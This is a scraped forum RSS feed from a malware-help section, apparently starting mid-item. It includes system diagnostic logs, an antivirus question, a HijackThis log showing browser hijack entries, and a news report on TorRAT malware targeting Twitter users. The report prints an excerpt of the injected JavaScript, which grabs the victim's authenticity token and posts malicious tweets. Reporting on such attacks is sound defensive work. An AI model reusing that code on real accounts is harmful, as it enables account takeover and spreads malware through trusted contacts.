Apple Mobile Device Support
Apple Software Update
avast! Free Antivirus
Bonjour
CameraHelperMsi
Chicken Invaders 3
Compatibility Pack for the 2007 Office system
D3DX10
Dell Dock
Dell Edoc Viewer
Dell Support Center
Dora's Big Birthday Adventure
Dora Saves the Crystal Kingdom!
erLT
Google Chrome
HiJackThis
Intel(R) Graphics Media Accelerator Driver
iTunes
Java(TM) 6 Update 45 (64-bit)
Junk Mail filter update
Kidzui
KONICA MINOLTA magicolor 1600W
Logitech Vid HD
Logitech Webcam Software
LWS Facebook
LWS Gallery
LWS Help_main
LWS Launcher
LWS Motion Detection
LWS Pictures And Video
LWS Twitter
LWS Video Mask Maker
LWS VideoEffects
LWS Webcam Software
LWS WLM Plugin
LWS YouTube Plugin
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Mouse and Keyboard Center
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Virtual PC 2007 SP1
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
Microsoft Works
MSVCRT
MSVCRT_amd64
Multimedia Card Reader
Panel Utility
Pivot Pro Plugin
PowerDVD DX
QuickTime
Realtek High Definition Audio Driver
ROBLOX Player for Vincent
ROBLOX Studio 2013 for Vincent
Roxio Burn
Safari
SDK
Secunia PSI (2.0.0.3001)
Security Update for CAPICOM (KB931906)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2160841)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)
Skype™ 6.3
SpongeBob and the Clash of Triton
swMSM
Unreal Tournament
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Windows 7 Upgrade Advisor
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live Sync
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
.
==== Event Viewer Messages From Past Week ========
.
5/17/2013 9:35:37 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x0000009f (0x0000000000000004, 0x0000000000000258, 0xfffffa800543f040, 0xfffff80000b9c510). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 051713-17643-01.
5/17/2013 5:53:18 PM, Error: Service Control Manager [7001]  - The Computer Browser service depends on the Server service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 5:51:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030}
5/17/2013 5:51:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
5/17/2013 5:51:24 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
5/17/2013 5:51:17 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC}
5/17/2013 5:51:12 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  aswSnx aswSP aswTdi discache SASDIFSV SASKUTIL spldr vmm Wanarpv6
5/17/2013 5:44:18 PM, Error: Microsoft-Windows-WindowsUpdateClient [20]  - Installation Failure: Windows failed to install the following update with error 0x8024200d: Security Update for Windows 7 for x64-based Systems (KB2667402).
5/17/2013 4:29:27 PM, Error: Service Control Manager [7001]  - The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:28:02 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netprofm with arguments "" in order to run the server: {A47979D2-C419-11D9-A5B4-001185AD2B89}
5/17/2013 4:28:02 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netman with arguments "" in order to run the server: {BA126AD1-2166-11D1-B1D0-00805FC1270E}
5/17/2013 4:27:49 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  AFD aswRdr aswSnx aswSP aswTdi DfsC discache NetBIOS NetBT nsiproxy Psched rdbss SASDIFSV SASKUTIL spldr tdx vmm Wanarpv6 WfpLwf
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB MiniRedirector Wrapper and Engine service depends on the Redirected Buffering Sub Sysytem service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The SMB 1.x MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:49 PM, Error: Service Control Manager [7001]  - The IP Helper service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The Workstation service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The TCP/IP NetBIOS Helper service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The Network Store Interface Service service depends on the NSI proxy service driver. service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The DNS Client service depends on the NetIO Legacy TDI Support Driver service which failed to start because of the following error:  A device attached to the system is not functioning.
5/17/2013 4:27:48 PM, Error: Service Control Manager [7001]  - The DHCP Client service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
.
==== End Of File ==========================='
]]> Viruses, Spyware and other Nasties slwf http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454849/vundo-and-maybe-other-issues Needed Help About Antivirus Service http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454319/needed-help-about-antivirus-service Fri, 10 May 2013 10:56:22 +0000 Hello Guys I want to know about which antivirus gives best " Antivirus Service " to their user for protecting data from the virus and malware attacks and also give which antivirus is good to use at the present time. Thanks in Advance Hello Guys I want to know about which antivirus gives best " Antivirus Service " to their user for protecting data from the virus and malware attacks and also give which antivirus is good to use at the present time. Thanks in Advance

]]> Viruses, Spyware and other Nasties alexalbert http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454319/needed-help-about-antivirus-service Javascript Twitter injection launches Man-in-the-Browser attacks http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks Mon, 06 May 2013 09:50:53 +0000 Dana Tamir, Enterprise Security Director for [Trusteer](http://www.trusteer.com/) has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication ... Dana Tamir, Enterprise Security Director for Trusteer has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by-malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:

function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length > 0 && $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".

]]> Viruses, Spyware and other Nasties happygeek http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453999/javascript-twitter-injection-launches-man-in-the-browser-attacks Can't delete hijacking virus http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453606/cant-delete-hijacking-virus Tue, 30 Apr 2013 01:10:20 +0000 Hi, I have some hijacking virus that I can't get rid of. I've tried Malwarebytes, tdsskiller, Skybot, AdAware and Superantispyware, cleaned some things, but it persists. Can anyone help? Below is the hijackthis log. Many thanks for any input. Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 9:00:16 PM, ... Hi,
I have some hijacking virus that I can't get rid of. I've tried Malwarebytes, tdsskiller, Skybot, AdAware and Superantispyware, cleaned some things, but it persists. Can anyone help? Below is the hijackthis log. Many thanks for any input.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:00:16 PM, on 4/29/2013
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ICO.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\FSRremoS.EXE
C:\Program Files\ThinkVantage\AMSG\Amsg.exe
C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
C:\Program Files\Lenovo\SafeGuard PrivateDisk\pdservice.exe
C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
C:\Program Files\PowerISO\PWRISOVM.EXE
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Analog Devices\SoundMAX\Smax4.exe
C:\Program Files\AVG\AVG10\avgtray.exe
C:\WINDOWS\system32\IPSSVC.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\AVG\AVG10\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\McAfee Security Scan\3.0.207\SSScheduler.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\AVG\AVG10\Identity Protection\agent\bin\avgidsmonitor.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\AVG\AVG10\avgnsx.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqSTE08.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\TomTom HOME 2\TomTomHOMEService.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\14.2.0\ToolbarUpdater.exe
C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe
C:\Program Files\Common Files\Pure Networks Shared\Platform\nmsrvc.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqnrs08.exe
C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
C:\Program Files\Common Files\Java\Java Update\jucheck.exe
C:\Program Files\iCamSource\iCamSource.exe
C:\PROGRA~1\AVG\AVG10\avgrsx.exe
C:\Program Files\AVG\AVG10\avgcsrvx.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\mstsc.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\Documents and Settings\Paul\My Documents\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://feed.snap.do/?publisher=SnapdoEMon&dpid=SnapdoEMon&co=US&userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&searchtype=ds&q={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://feed.snap.do/?publisher=SnapdoEMon&dpid=SnapdoEMon&co=US&userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&searchtype=ds&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://feed.snap.do/?publisher=SnapdoEMon&dpid=SnapdoEMon&co=US&userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&searchtype=hp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://feed.snap.do/?publisher=SnapdoEMon&dpid=SnapdoEMon&co=US&userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&searchtype=ds&q={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://feed.snap.do/?publisher=SnapdoEMon&dpid=SnapdoEMon&co=US&userid=e777553c-7dd3-41e4-b64e-57ba2f7c0d42&searchtype=ds&q={searchTerms}
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: InfoAtoms - {103089DA-0F31-4A8B-843F-7D24A7FE8345} - C:\Program Files\InfoAtoms\IE32\InfoAtomsClientIE.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: BitComet ClickCapture - {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG10\avgssie.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\System32\DLA\DLASHX_W.DLL
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\14.2.0.1\AVG Secure Search_toolbar.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.2.4204.1700\swg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ThinkVantage Password Manager - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\14.2.0.1\AVG Secure Search_toolbar.dll
O3 - Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - (no file)
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.EXE
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe
O4 - HKLM\..\Run: [LPManager] C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
O4 - HKLM\..\Run: [TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
O4 - HKLM\..\Run: [PDService.exe] "C:\Program Files\Lenovo\SafeGuard PrivateDisk\pdservice.exe"
O4 - HKLM\..\Run: [cssauth] "C:\Program Files\Lenovo\Client Security Solution\cssauth.exe" silent
O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [vProt] "C:\Program Files\AVG Secure Search\vprot.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [SoundMax] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [AVG_TRAY] C:\Program Files\AVG\AVG10\avgtray.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [AdobeAAMUpdater-1.0] "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
O4 - HKCU\..\RunOnce: [FlashPlayerUpdate] C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_6_602_180_Plugin.exe -update plugin
O4 - HKUS\S-1-5-18\..\RunOnce: [WUAppSetup] C:\Program Files\Common Files\logishrd\WUApp32.exe -v 0x046d -p 0x0809 -f video -m logitech -d 13.51.823.0 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [WUAppSetup] C:\Program Files\Common Files\logishrd\WUApp32.exe -v 0x046d -p 0x0809 -f video -m logitech -d 13.51.823.0 (User 'Default user')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.0.207\SSScheduler.exe
O8 - Extra context menu item: &D&ownload &with BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddLink.htm
O8 - Extra context menu item: &D&ownload all with BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddAllLink.htm
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: Download with &Media Finder - C:\Program Files\Media Finder\hook.html
O8 - Extra context menu item: Download with ImTOO Download YouTube Video - C:\Program Files\ImTOO\Download YouTube Video\upod_link.HTM
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra 'Tools' menuitem: ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: BitComet - {D18A0B52-D63C-4ed0-AFC6-C1E3DC1AF43A} - res://C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll/206 (file missing)
O9 - Extra button: System Update - {DA320635-F48C-4613-8325-D75A933C549E} - C:\Program Files\Lenovo\System Update\sulauncher.exe
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1340400771796
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1340400763250
O16 - DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - 
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{EE9E0D08-A833-44F5-A4E5-A1AC56088EF1}: Domain = vpn.gatech.edu
O17 - HKLM\System\CCS\Services\Tcpip\..\{EE9E0D08-A833-44F5-A4E5-A1AC56088EF1}: NameServer = 128.61.244.254,130.207.244.244
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = vpn.gatech.edu,hsd1.ga.comcast.net.
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = vpn.gatech.edu,hsd1.ga.comcast.net.
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\14.2.0\ViProtocol.dll
O20 - Winlogon Notify: AwayNotify - C:\Program Files\Lenovo\AwayTask\AwayNotify.dll
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
O23 - Service: Adobe Active File Monitor V10 (AdobeActiveFileMonitor10.0) - Adobe Systems Incorporated - C:\Program Files\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
O23 - Service: Adobe Active File Monitor V11 (AdobeActiveFileMonitor11.0) - Adobe Systems Incorporated - C:\Program Files\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: AVGIDSAgent - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe
O23 - Service: AVG WatchDog (avgwd) - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG10\avgwdsvc.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
